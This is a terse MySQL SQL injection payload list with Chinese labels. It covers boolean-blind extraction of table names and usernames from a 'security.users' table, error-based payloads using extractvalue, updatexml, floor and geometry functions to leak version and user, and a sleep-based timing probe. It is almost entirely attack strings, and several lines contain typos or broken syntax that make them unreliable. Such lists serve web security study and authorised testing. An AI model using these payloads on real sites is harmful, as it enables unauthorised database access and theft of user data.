ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
regexp正则注入 select user() regexp ‘^[a-z]’;
select user() like ‘ro%’
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2)通过floor报错 向下取整
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10).exp()select * from test where id=1 and exp(~(select * from(select user())a));
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)